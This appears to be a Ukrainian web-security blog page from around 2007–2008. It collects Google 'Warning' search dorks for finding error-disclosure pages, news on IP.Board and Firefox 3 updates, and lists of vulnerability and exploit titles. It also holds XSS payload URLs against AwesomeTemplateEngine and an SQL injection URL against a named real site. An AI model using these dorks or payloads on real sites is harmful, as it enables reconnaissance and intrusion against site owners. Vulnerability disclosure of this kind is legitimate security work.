Websecurity - Веб безпека

Продовжу тему “Warning” Гугл хакінга (”Warning” Google hacking). Котрий є різновидом Гугл хакінга - використання пошукових систем (зокрема Гугла) для пошуку уразливостей на сайтах.

Дана методика передбачає використання Гугла (чи інших пошукових систем) з метою пошуку повідомлень на сайтах про помилки, і дозволяє знайти важливу інформацію стосовно даних сайтів. За допомогою спеціальних пошукових запитів (дорків) можна знайти Full path disclosure та Information disclosure уразливості на різноманітних сайтах в Інтернеті.

Новий перелік “варнінг” пошукових запитів (dorks):

Warning: preg_replace

Warning: preg_grep

Warning: preg_match_all

Warning: preg_match

Warning: preg_quote

Warning: preg_replace_callback

Warning: preg_split

Warning: mysql_data_seek

Warning: require

Warning: require_once

Warning: fwrite

Warning: flock

Warning: unlink

Warning: file

Warning: readfile

В листопаді минулого року вийшов Invision Power Board v2.3.3, тому всім хто користується движком IPB, раджу звернути увагу на нову версію.

• Русская версия IP.Board 2.3.3 (деталі)

Компанія IBResource офіційно повідомляє про випуск російської версії форуму IР.Воard v2.3.3 (Invision Power Board).

Вихід цієї версії пов’язаний винятково з виправленням декількох десятків помилок, знайдених у версіях 2.3.1 і 2.3.2. Були незначно змінені HTML шаблони в стилях. Але кардинальних змін не було, тому ваші власні стилі від IPB 2.3.1 будуть цілком сумісні з 2.3.3.

В даній добірці уразливості в веб додатках:

• DoS Vulnerability in Konqueror 3.5.7 (деталі)
• nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability (деталі)
• ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities (деталі)
• XSS in [Calendar Express 2 ] (деталі)
• XSS in [deskpro.com v1.1.0 ] (деталі)
• Vulnerability in MOHA Chat (деталі)
• Cross-site scripting (XSS) vulnerability in @Mail (деталі)
• New links2 packages fix arbitrary shell command execution (деталі)
• Пустий пароль для входу в WebAdmin в MailEnable (деталі)
• Multiple PHP remote file inclusion vulnerabilities in phpProfiles (деталі)
• Cross-site request forgery (CSRF) vulnerability in urlobox in MKPortal (деталі)
• Vulnerability in Sun Java Development Kit (JDK), Java Runtime Environment (JRE) and Java System Development Kit (SDK) (деталі)
• Міжсайтовий скриптінг в TikiWiki (деталі)
• Обхід каталогу в JBoss DeploymentFileRepository (деталі)
• Міжсайтовий скриптінг і SQL-ін’єкція в ClickGallery (деталі)

В жовтні, 31.10.2007, я знайшов Cross-Site Scripting уразливості в AwesomeTemplateEngine.

Уразливості в файлі example_template.php в параметрах data[title], data[message], data[table][1][item], data[table][1][url] та data[poweredby]. Атака можлива при включених register globals.

XSS:

http://site/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[table][1][item]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[table][1][url]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Після серії альфа-релізів нещодавно була випущена перша бета-версія браузера Firefox 3. Вона містить цілий ряд виправлень помилок, а також деякі поліпшення. Зокрема, багато уваги приділено безпеці: інформація про те, наскільки сайт небезпечний, тепер більш помітна, поліпшена інтеграція з антивірусом у модулі для завантаження файлів, поліпшена перевірка версій небезпечних плагінів, захист від шкідливих модулів і від помилок SSL на веб-сторінках.

Багато нововведень пов’язані зі спрощенням доступу до команд. Зокрема, поліпшене керування паролями, встановлення плагінів, у менеджері завантаження з’явилася можливість припинення і поновлення скачування, поліпшена інтеграція з Windows Vista і Mac OS X. Також варто відзначити можливість масштабування цілої сторінки, швидкий пошук по закладках й історії відвіданих сторінок, більш зручні налаштування завантаження файлів по типах.

Розробники також відзначають зміни в движку візуалізації HTML, що забезпечує поліпшену підтримку CSS, керування колірними профілями, поліпшену візуалізацію шрифтів і графічних елементів.

По матеріалам http://ain.com.ua.

29.07.2007

У лютому, 05.02.2007, я знайшов Cross-Site Scripting, SQL Injection та Full path disclosure уразливості на проекті http://miranda.org.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

02.01.2008

XSS:

• alert(document.cookie) (виправлена)
• alert(document.cookie)
• цікавий
• html включення (PR4)

SQL Injection:

http://miranda.org.ua/plugins/1%20or%201=1/*

Full path disclosure:

http://miranda.org.ua/index.php?name=1 (виправлена)

Частина уразливостей досі не виправлена.

В даній добірці експлоіти в веб додатках:

• Yvora CMS 1.0 (error_view.php ID) Remote SQL Injection Vulnerability (деталі)
• Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities (деталі)
• STPHPLibrary (STPHPLIB_DIR) Remote File Inclusion Vulnerability (деталі)
• eNetman v.20050830 (index.php page) Remote File Inclusion Vulnerability (деталі)
• Web Oddity Web Server 0.09b Directory Transversal Exploit (деталі)
• PHPOF <= 20040226 (DB_adodb.class.php) RFI Vulnerability (деталі)
• AnyInventory <= 1.9.1 (environment.php) Remote File Inclusion Vuln (деталі)
• phpMytourney (menu.php) Remote File Inclusion Vulnerability (деталі)
• RW::Download 2.0.3 lite (index.php dlid) Remote SQL Injection Vuln (деталі)
• AJ Forum 1.0 (topic_title.php) Remote BLIND SQL Injection Exploit (деталі)